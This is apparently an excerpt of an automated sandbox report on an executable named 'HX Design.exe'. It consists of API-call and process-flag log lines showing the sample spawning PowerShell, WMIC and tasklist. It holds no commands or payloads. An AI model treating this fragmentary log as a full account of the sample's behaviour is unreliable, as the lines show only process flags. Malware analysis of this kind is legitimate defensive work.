              Source: C:\Users\user\Desktop\HX Design.exeCode function: 0_2_00007FF732065830 GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,0_2_00007FF732065830
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
